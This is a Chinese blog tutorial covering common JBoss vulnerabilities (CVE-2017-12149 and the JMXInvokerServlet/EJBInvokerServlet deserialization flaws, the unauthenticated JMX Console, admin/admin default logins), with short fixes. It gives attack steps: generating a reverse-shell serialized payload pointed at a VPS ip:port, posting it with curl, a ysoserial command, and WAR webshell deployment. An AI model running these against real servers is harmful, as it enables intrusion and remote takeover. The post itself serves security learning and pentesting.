深入浅出带你学习JBoss中间件常见漏洞

最新推荐文章于 2023-09-21 10:49:19 发布
最新推荐文章于 2023-09-21 10:49:19 发布
阅读量810 收藏
点赞数
文章标签: 中间件 学习 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Android_boom/article/details/129070853
版权

前言

本文给大家带来的是JBOSS中间件漏洞的总结,详细讲解一下JBOSS中间件的常见漏洞以及利用方法,本文就着JBOSS中间件的特性来分析该中间件的常见漏洞利用方式,下面我们展开文章来讲。

什么是JBOSS?

简单来说可以介绍为一个开源的符合J2EE规范的应用服务器,作为J2EE规范的补充,Jboss中引入了AOP框架,为普通Java类提供了J2EE服务,而无需遵循EJB规范。

该中间件的特点如下:

它将具有革命性的JMX微内核服务作为其总线结构;

它本身就是面向服务的架构(Service-Oriented Architecture,SOA);

它还具有统一的类装载器,从而能够实现应用的热部署和热卸载能力。

了解完JBOSS中间件的介绍,下面我们来讲关于该中间件的漏洞。

JBoss 5.x/6.x 反序列化漏洞

漏洞编号为CVE-2017-12149,这个漏洞利用了 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,如果包含恶意数据则会导致该漏洞。

下面用实例来给大家展示一下,首先访问我们部署的站点:

访问URL:

http://*****/invoker/readonly

出现下面界面说明可能存在该漏洞:

这里下载漏洞利用链接:

scan.javasec.cn/java/JavaDe…

使用命令执行脚本:

java -cp .:commons-collections-3.2.1.jarReverseShellCommonsCollectionsHashMap ip:port//ip为VPS的IP

之后使用CURL命令来对靶机进行攻击:

curl 靶机ip/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

监听一下我们反弹SHELL的接口:

当然该漏洞也有图形化利用工具,有兴趣的小伙伴可以自己去找一找。修复方法可以通过删除http-invoker.sar 组件来进行漏洞的防御。

JMXInvokerServlet 反序列化漏洞

漏洞原因是在路径/invoker/JMXInvokerServlet中请求接受了我们传入的对象,同时利用一系列恶意代码来进行命令执行。影响版本如下:

判断该漏洞的方法也十分简单,在invoker/JMXInvokerServlet只要有文件下载,就可以判断存在该漏洞,因为在访问时请求了对象于是我们可以使用JAVA反序列化工具ysoserial生成payload放入BODY体中发送。利用语句如下:

java -jar ysoserial.jar CommonsCollections5 "touch /tmp/success" > poc.ser

可以考虑的修复方法为禁用JBoss的JMXInvokerServlet接口(默认8080)。

EJBInvokerServlet 反序列化漏洞

该漏洞与上面讲的漏洞原理相似,而且利用PAYLOAD也可以一致,唯一的区别就是该漏洞利用的是org.jboss.invocation.MarshalledValue,判断条件也差不多,访问:

invoker/EJBInvokerServlet

返回文件则可以判断漏洞存在,于是我们可以尝试攻击。

JMX Console未授权访问

JBOSS有个webUI界面,访问路径jmx-console,默认密码弱口令,于是攻击者可以利用该漏洞查询数据信息甚至上传木马,进入页面如下:

我们可以在jboss.deployment里面的void addURL()里部署WAR包进行GETSHELL攻击,需要注意的是需要点击invoke进行WAR包的部署,部署成功后访问木马即可。

Administration Console 弱口令

Administration Console登陆界面如果密码没有修改的话默认为:

admin/admin

于是攻击者可以通过弱口令爆破进行攻击,然后在后台部署WAR包进行GETSHELL:

成功部署的提示为

Resource xino.war created successfully!

之后通过WEBSHELL连接工具进行连接。

结语

本文简单总结了一下JBOSS中间件常见的漏洞,可以看到JBOSS中间件漏洞利用方式还是听多样的,很多涉及了后台WAR包的部署来进行GETSHELL,同时也存在弱口令等常见漏洞,当然也简单介绍了一下漏洞的修复方法,对该中间件漏洞感兴趣的小伙伴可以自己去进行环境的搭建来进行渗透测试,一定会有所收获。

最后

最近找到一个VUE的文档,它将VUE的各个知识点进行了总结,整理成了《Vue 开发必须知道的36个技巧》。内容比较详实,对各个知识点的讲解也十分到位。



有需要的小伙伴,可以点击下方卡片领取,无偿分享

Web_boom
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web服务器/中间件漏洞系列3:jboss漏洞汇总
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
11-30 1538
JBOSSS简介: JBoss一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。 一、CVE-2017-12149 1、漏洞简介 漏洞类型:java 反序列化 漏洞原理: 该漏洞Java反序列化错误类型,存在Jboss 的 HttpInvoker 组件中的 .
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149)
07-23
CVE-2017-12149漏洞利用工具,针对该漏洞快速方便的进行利用。
JBoss常见漏洞整理
寒星的博客
06-01 1万+
JBoss常见漏洞整理 JBoss一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。 JBoss高危漏洞主要涉及到以下两种。 第一种是利用未授权访问进入JBoss后台进行文件上传的漏洞,例如:CVE-2007-1036,CVE-2010-0738,CVE-2006.
JBoss中间件漏洞汇总
热门推荐
混子
11-18 1万+
目录 一、JBoss是什么? 二、安装环境 1. Jdk 2. 下载JBoos4、6,并进行配置 三、 反序列漏洞 1. HttpInvoker 组件(CVE-2017-12149) 2. JMXInvokerServlet组件(CVE-2015-7501) 3. JBossMQ(CVE-2017-7504) 4.EJBInvokerServlet组件(CVE-2013-4810) 四、 War后门文件部署 1. admin-cosole(爆红接着传) 2. JMX-console.
JBoss漏洞
周星星的博客
10-24 863
JBoss漏洞的简单学习记录
Jboss中间件两大漏洞分析
fansenliangren的博客
12-28 1459
反序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中;反序列化即逆过程,由字节流还原成对象。Java中的ObjectOutputStream类的writeObject()方法可以实现序列化,ObjectInputStream类的readObject()方法用于反序列化。
JBoss中间件漏洞总结1
08-03
2. 下载并安装 Jboss6 3. 下载并安装 Jboss4 1. 升级新版本 3. 添加如下代码 http-invoker.sar 下 web.xml 的
常见中间件漏洞总结PPT
01-25
常见中间件漏洞总结PPT,内含tomcat、weblogic、Nginx、iis、jboss等的常见漏洞和介绍,培训学习均可用。
深入浅出JBoss_2BSeam
09-04
深入浅出JBoss_2BSeam深入浅出JBoss_2BSeam
深入浅出-jbossseam说明
08-03
深入浅出-jbossseam详细说明,文中详细说明了jbossseam的各种技术及部署
JBoss JMXInvokerServlet 反序列化漏洞
Kevin's Blog
06-08 2478
一、漏洞介绍 1.1 漏洞简介   经典的JBoss反序列化漏洞JBoss在 /invoker/JMXInvokerServlet 请求中读取了用户传入的对象存在反序列化漏洞。 1.2 影响版本 JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10 JBoss AS (Wildly) 6 and earlier JBoss A-MQ 6.2.0 JBoss Fuse 6.2.0 JBoss SOA Platform (SOA-P) 5.
JBoss 相关漏洞复现及利用
最新发布
weixin_45908624的博客
09-21 922
JBoss Application Server 相关漏洞复现
JMX Console 未授权访问漏洞
懂进攻知防守
07-23 4503
JbosswebUI界面http//ipport/jmx-console未授权访问(或默认密码admin/admin),可导致JBoss的部署管理的信息泄露,攻击者也可以直接上传木马获取webshell。
JBoss JMXInvokerServlet 反序列化漏洞复现
W小哥
05-26 1772
一、漏洞描述 影响范围 JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10 JBoss AS (Wildly) 6 and earlier JBoss A-MQ 6.2.0 JBoss Fuse 6.2.0 JBoss SOA Platform (SOA-P) 5.3.1 JBoss Data Grid (JDG) 6.5.0 JBoss BRMS (BRMS) 6.1.0 JBoss BPMS (BPMS) 6.1.0 JBoss Da
jboss漏洞利用
嘻嘻哈哈
01-24 3796
JBOSS简介 1、 概念 JBoss一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3.0的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。 2、优点 JBoss是免费的,开放源代码J2EE的实现,通过LGPL许可证进行发布。 JBoss需要的内存和硬盘空间比较小。 安装非常简单。
常见中间件解析漏洞有哪些
05-20
常见中间件解析漏洞包括但不限于以下几类: 1. Web 服务器解析漏洞:包括 Apache、Nginx、IIS 等服务器的解析漏洞,通常是由于配置不当或者缺少安全补丁导致攻击者可以通过发送特定的 HTTP 请求来触发漏洞。 2. 数据库解析漏洞:包括 MySQL、Oracle 等数据库的解析漏洞,通常是由于 SQL 注入等攻击手段导致攻击者可以绕过输入过滤和验证机制,直接执行恶意代码。 3. 中间件解析漏洞:包括 Tomcat、JbossWebLogic 等中间件的解析漏洞,通常是由于未经身份验证的用户可以上传恶意文件并在服务器上执行代码,从而实现远程命令执行。 4. 操作系统解析漏洞:包括 Windows、Linux、Unix 等操作系统的解析漏洞,通常是由于操作系统内部的漏洞或者配置不当导致攻击者可以获取系统权限或者执行恶意代码。 这些漏洞存在会给系统来严重的安全风险,因此需要及时修补和加强防护。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值